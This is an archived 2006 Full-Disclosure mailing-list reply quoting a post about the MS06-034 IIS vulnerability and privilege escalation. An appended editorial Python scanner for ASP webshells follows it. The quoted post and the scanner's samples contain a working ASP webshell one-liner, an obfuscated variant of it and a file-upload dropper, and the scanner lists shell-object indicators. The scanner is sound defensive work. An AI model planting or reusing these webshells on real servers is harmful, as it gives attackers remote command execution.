Date: Tue, 25 Jul 2006 23:28:39 -0500
From: <daylasoul@...h.com>
To: <full-disclosure@...ts.grok.org.uk>
Cc: 
Subject: Re: MS06-034 lies? IIS 6 can still be owned?



On Tue, 25 Jul 2006 19:39:23 -0500 Cesar <cesarc56@...oo.com> wrote:
>Hi all.
>
>After getting the details of MS06-034 early, I thought
>it would be cool to build the exploits, since there had
>been a long time without any IIS exploit and our
>customers (see *1) would like it, so I asked the guys
>to build the exploits and said I would take care of the
>part of elevating privileges, since I had some theory
>that there was a way to elevate privileges.
>What was funny is that some time later I realized that
>if you can upload an ASP page then it's pretty simple
>to have a remote shell running under the same account
>that the exploits would run under:
>
>-----shell.asp (got this from xfocus.org)------
><%=server.createobject("wscript.shell").exec("cmd.exe
>/c " & request("command")).stdout.readall%>
>-------------------------------------------
>So I wonder why MS patched the vulnerability if it's
>pretty simple to have a remote shell on default
>configurations?
>
>Maybe because wscript.shell can be disabled, removed,
>etc., or you can't run or upload .exe on the server;
>in these cases the exploit will be handy.
>
>Also MS stated:
>-----------------------------
>on Mitigating Factors ....
>
>• On IIS 5.0 and IIS 5.1, ASP enabled applications by
>default run in the 'Pooled Out of Process'
>application, which means they run in DLLHOST.exe,
>which is running in the context of the low privilege
>IWAM_<machinename> account.
>  
>• By default, ASP is not enabled on IIS 6.0. If ASP is
>enabled, it runs in the context of a W3WP.exe worker
>process running as the low privilege 'NetworkService'
>account.
>
>on FAQ Workarounds...
>-What might an attacker use the vulnerability to do?
>An attacker who successfully exploited this
>vulnerability could take complete control of the
>affected system.
>
>----------------------
>That's pretty confusing since they are saying IIS 5 &
>6 run under low privileged accounts and then they
>say an attacker could take complete control...???
>
>My theory on the elevation of privileges was in part
>wrong, but I could elevate privileges, so now the
>exploits can also give you a remote shell under an
>administrative account, which I think is why MS
>patched the vulnerability.
>While MS fixed the ASP vulnerability they didn't fix
>a design flaw that allows elevating privileges if you
>can run code under the IIS 5 & 6 low privileged accounts
>:)
>
>So no matter if you applied the fix, if you let users
>upload and run binaries from ASP pages on default
>settings then your server can still be owned.
>
>
>
>Cesar.
>(*1 http://www.argeniss.com/products.html)
>

Please note that self-promotion is forbidden on the list.


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
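As an added example (editorial code, not part of either message above and not from the page's authors), here is a small scanner for the pattern Cesar quotes: an ASP file that instantiates a shell-capable COM object (WScript.Shell) and feeds it request-controlled input. The sample files are constructed inline; only shell.asp reproduces the xfocus one-liner from the thread. The indicator lists and the three verdict labels are assumptions chosen for illustration, not an exhaustive webshell catalogue. The normalize() step re-joins split string literals ("WScr" & "ipt.Shell"), a common trick for getting past a naive grep for "wscript.shell".

```python
import re

# Constructed sample ASP files. shell.asp is the one-liner quoted in the thread;
# the other three are made up here to exercise the classifier.
SAMPLES = {
    "shell.asp": (
        '<%=server.createobject("wscript.shell").exec("cmd.exe /c " '
        '& request("command")).stdout.readall%>'
    ),
    "obf.asp": (
        '<% Set o = Server.CreateObject("WScr" & "ipt.Sh" & "ell") '
        ': Set e = o.Exec("cmd /c " & Request.Form("c")) '
        ': Response.Write e.StdOut.ReadAll %>'
    ),
    "upload.asp": (
        '<% Set fs = Server.CreateObject("Scripting.FileSystemObject") '
        ': fs.CreateTextFile(Request("p")).Write(Request("d")) %>'
    ),
    "hello.asp": (
        '<% Response.Write("Hello, " & Server.HTMLEncode(Request("name"))) %>'
    ),
}

# Indicator lists are editorial assumptions, not a complete catalogue.
SHELL_OBJECTS = ("wscript.shell", "shell.application")
FILE_OBJECTS = ("scripting.filesystemobject", "adodb.stream")
EXEC_SINKS = re.compile(r"\.(exec|run|shellexecute)\s*\(")
REQUEST_SOURCES = re.compile(
    r"\brequest(\.(form|querystring|cookies|servervariables))?\s*\("
)
# Matches the  " & "  between two string literals so "WScr" & "ipt" -> "WScript".
CONCAT = re.compile(r'"\s*&\s*"')


def normalize(src: str) -> str:
    """Lower-case the source and re-join split string literals."""
    src = src.lower()
    prev = None
    while prev != src:          # repeat until no more "a" & "b" pairs remain
        prev, src = src, CONCAT.sub("", src)
    return src


def classify(src: str) -> str:
    """Return 'webshell', 'suspicious' or 'clean' for one ASP source file.

    webshell   : shell object + exec-style sink + request-controlled input
    suspicious : shell or file object reachable from request input, no exec sink
    clean      : neither
    """
    s = normalize(src)
    tainted = bool(REQUEST_SOURCES.search(s))
    spawns = any(o in s for o in SHELL_OBJECTS) and bool(EXEC_SINKS.search(s))
    writes = any(o in s for o in FILE_OBJECTS)
    if spawns and tainted:
        return "webshell"
    if (spawns or writes) and tainted:
        return "suspicious"
    return "clean"


def scan(files: dict) -> dict:
    """Classify every (name, source) pair; in practice, read these from the webroot."""
    return {name: classify(src) for name, src in files.items()}


if __name__ == "__main__":
    for name, verdict in scan(SAMPLES).items():
        print(f"{name:12s} {verdict}")
```

Run against a real webroot, the interesting hits are usually the "suspicious" ones: a file that only writes request data through FileSystemObject is the dropper that puts shell.asp on disk in the first place. A scanner like this catches the classic pattern only; anything using Eval/Execute on decoded strings needs a different approach.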
